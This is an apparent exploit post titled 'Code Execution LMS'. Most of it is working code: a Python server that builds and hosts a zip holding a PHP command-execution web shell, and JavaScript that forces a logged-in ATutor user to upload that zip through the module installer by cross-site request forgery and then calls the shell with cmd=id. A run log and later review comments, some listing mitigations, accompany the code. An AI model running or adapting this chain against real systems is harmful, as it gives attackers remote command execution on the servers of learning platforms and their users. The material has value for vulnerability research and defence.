cyberking

Code Execution LMS

Mar 13th, 2016
  1. #!/usr/bin/python
  2.  
  3. import sys
  4. import zipfile
  5. import BaseHTTPServer
  6. from cStringIO import StringIO
  7. from SimpleHTTPServer import SimpleHTTPRequestHandler
  8.  
# Two positional arguments are required: the listen port (consumed by
# BaseHTTPServer.test() via sys.argv[1]) and the target host (read by
# CORSRequestHandler via sys.argv[2]). Nothing beyond the argument count
# is validated.
if len(sys.argv) < 3:
    print "Usage: %s <lport> <target>" % sys.argv[0]
    print "eg: %s 8000 172.16.69.128" % sys.argv[0]
    sys.exit(1)
  13.  
def _build_zip():
    """
    Write pwn.zip to the current working directory.

    The archive holds a single entry, pwn/si.php, whose body passes the
    request's ``cmd`` parameter straight to PHP's system(): unpacked under a
    web-served directory it is a command-execution web shell, which is the
    artifact a content scan of uploaded module archives would need to catch.
    The zip is assembled in memory (StringIO) and then dumped to disk so the
    static-file handler below can serve it from the working directory.
    """
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    z.writestr('pwn/si.php', "<?php system($_GET['cmd']); ?>")
    z.close()
    handle = open('pwn.zip','wb')
    handle.write(f.getvalue())
    # NOTE(review): missing parentheses -- this evaluates the bound method and
    # discards it, so the file is only closed (and flushed) when ``handle`` is
    # garbage-collected at function exit.
    handle.close
  25.  
class CORSRequestHandler (SimpleHTTPRequestHandler):
    """
    Static-file handler (serves the working directory) that adds a CORS
    allow-origin header naming the target host.

    Without that header a page running on the target's origin could not read
    the body of a cross-origin XHR to this server; with it, the browser-side
    script can fetch pwn.zip from here. The value is ``http://<target>`` with
    no port, so it only matches an Origin on the default HTTP port.
    """
    def end_headers (self):
        # sys.argv[2] is the <target> argument whose presence is checked at
        # the top of the file.
        self.send_header('Access-Control-Allow-Origin', 'http://%s' % sys.argv[2])
        SimpleHTTPRequestHandler.end_headers(self)
  30.  
if __name__ == '__main__':
    # Create pwn.zip in the working directory, then serve that directory.
    _build_zip()
    # BaseHTTPServer.test() binds 0.0.0.0 and takes the port from sys.argv[1]
    # (the <lport> argument). Everything in the working directory is exposed,
    # not just pwn.zip.
    BaseHTTPServer.test(CORSRequestHandler, BaseHTTPServer.HTTPServer)
  34.  
  35. mr_me@jupiter:~$ ./poc.py 8000 172.16.69.128
  36. Serving HTTP on 0.0.0.0 port 8000 ...
  37. 172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /exp.js HTTP/1.1" 200 -
  38. 172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /pwn.zip HTTP/1.1" 200 -
  39.  
  40. ~ de Mexico con amor,
  41.  
  42. */
  43.  
// Parse `href` with an anchor element and return "hostname:port".
// NOTE(review): when the URL carries no explicit port, `l.port` is the empty
// string, so the result ends in a bare colon ("host:"); the caller below
// builds "http://" + that + "/pwn.zip", which presumably still resolves to
// the default port.
var get_hostname = function(href) {
    var l = document.createElement("a");
    l.href = href;
    return l.hostname + ":" + l.port;
};
  49.  
// Upload `file_data` (a binary string) as a multipart/form-data file field
// named "modulefile" to the relative path `url`, then request the PHP file
// the archive is expected to have dropped.
//
// Because `url` is same-origin for the page this script runs in, the browser
// attaches that page's cookies: the POST is made in the viewing user's
// session (presumably one that is allowed to install modules -- the page
// does not show what the endpoint requires). This is the cross-site request
// forgery half of the chain; the server-side weakness it apparently relies on
// is a module installer that accepts an attacker-supplied archive and
// extracts it under a web-served path. Anti-CSRF tokens on the install form,
// rejecting archives containing executable content, and not letting PHP run
// under the module directory each break the chain.
function trolololol(url, file_data, filename) {
   var file_size = file_data.length,
   boundary = "828116593165207937691721278",
   xhr = new XMLHttpRequest();

   // Firefox no longer exposes the non-standard sendAsBinary(); rebuild it by
   // packing the low byte of each char code into a Uint8Array and sending
   // the underlying buffer.
   if(!xhr.sendAsBinary){
      xhr.sendAsBinary = function(datastr) {
          function byteValue(x) {
              return x.charCodeAt(0) & 0xff;
          }
          var ords = Array.prototype.map.call(datastr, byteValue);
          var ui8a = new Uint8Array(ords);
          this.send(ui8a.buffer);
      }
   }
   
   // Fires when the upload request reaches DONE, regardless of its status.
   // It then issues a GET to the PHP file the unpacked archive should have
   // placed under mods/pwn/, with cmd=id. The outer `xhr` is rebound to the
   // new request, which has no handlers, so the response is never read by
   // this page.
   xhr.onreadystatechange = function() {
       if (xhr.readyState == XMLHttpRequest.DONE) {
           xhr = new XMLHttpRequest();
           // this path must match the entry name written into the zip (pwn/si.php)
           xhr.open("GET", "/ATutor/mods/pwn/si.php?cmd=id", true);
           xhr.send();
       }
   }

   xhr.open("POST", url, true);
   // Hand-rolled multipart request. Its framing deviates from RFC 2046 in the
   // Content-Type separator (", boundary=" rather than "; boundary=") and in
   // the closing delimiter, which can serve as a request fingerprint.
   xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
   // Content-Length is a forbidden request header for XMLHttpRequest; the
   // browser ignores this call and derives the length from the body itself.
   xhr.setRequestHeader("Content-Length", file_size);
   var body = "--" + boundary + "\r\n";
   body += 'Content-Disposition: form-data; name="modulefile"; filename="' + filename + '"\r\n';
   body += "Content-Type: archive/zip\r\n\r\n";
   body += file_data + "\r\n";
   body += "--" + boundary + "\r\n";
   body += 'Content-Disposition: form-data; name="install_upload"\r\n\r\n';
   body += "junk\r\n";
   body += "--" + boundary;
   xhr.sendAsBinary(body);
   return true;
}
  92.  
// Entry point. Fetch pwn.zip from the host that served this script (assumed
// to be the first <script> on the page, see document.scripts[0]), read the
// response as a binary string, and hand it to trolololol() for upload to the
// application's module installer.
//
// The cross-origin GET is only readable because that host answers with an
// Access-Control-Allow-Origin header for this page's origin; the Python
// server above sets that header per target.
function pwn(){
    var xhr = new XMLHttpRequest();
    // "host:port" of the server that delivered this script
    var home = get_hostname(document.scripts[0].src);
    // fetch the prepared archive from that server
    xhr.open('GET', 'http://' + home + '/pwn.zip', true);
    xhr.responseType = 'blob';
    xhr.onload = function(e) {
        if (this.status == 200) {
            // FileReader turns the Blob into the raw byte string sendAsBinary() expects
            var reader = new window.FileReader();
            reader.readAsBinaryString(new Blob([this.response], {type: 'application/zip'}));
            reader.onloadend = function() {
                // relative URL: the POST goes to the origin this page is served from
                trolololol("/ATutor/mods/_core/modules/install_modules.php", reader.result, "pwn.zip");
            }
        }
    };
    xhr.send();
}
  112.  
// Runs as soon as the script loads; nothing is awaited or reported back to the page.
pwn();